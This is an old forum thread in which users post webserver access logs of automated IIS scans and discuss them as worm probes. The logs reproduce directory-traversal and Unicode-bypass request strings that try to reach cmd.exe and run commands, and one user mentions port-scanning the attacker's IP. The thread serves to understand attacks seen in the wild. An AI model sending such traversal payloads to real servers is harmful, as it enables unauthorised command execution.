Found this in my log from my webserver running on my computer, I found it funny ;D
12.211.62.105 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:02:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
Looks like a script kiddie scanning for well known IIS holes. I wonder what all those holes are.
vL.com gets those daily, and many more.
I've seen most of those for 3+ years.
The ..%255c../ looks like it is trying to exploit both parent paths and unicode bypass exploit at the same time.
The MSADC is an exploitable sample site that is installed with II4 and IIS5, which allow increased permissions to the attacker.
The rest of it is a lot of pecking around for figuring out your architecture.
Hmm, I'm only Windows XP Home Edition, and that's an Abyss Web Server (http://www.aprelium.com). I don't think by doing that they can confuse the server or get past it or whatever - But, I don't know anything about website/server cracking
I scanned his ip with thing's scanner, found nothing sadly :(
My IP or his? ;)
I only see one ip.. assumed it was his :P
Oh it is his, but I thought since you're a moderator, you could have gotten my IP :P
Those 14 entries are the signature of a machine infected with CodeRed. It is trying to infect yours.
$torm made a fine script on one of my boxes which searches the Apache access log and copies CodeRed entries to a text file. Here is a small portion of that file:
63.225.238.53 - - [08/Sep/2002:00:47:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
Nobody infects my computer!
134.202.1.149 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
Only one I saw. But I'm to lazy to look through them all.
On Apache, Thing wanna send me that file by $torm? :D
QuoteOn Apache, Thing wanna send me that file by $torm?
You should ask him. He wrote it.
where would I see him to ask?
PM this (http://forum.valhallalegends.com/phpbbs/index.php?action=viewprofile;user=St0rm.iD) guy.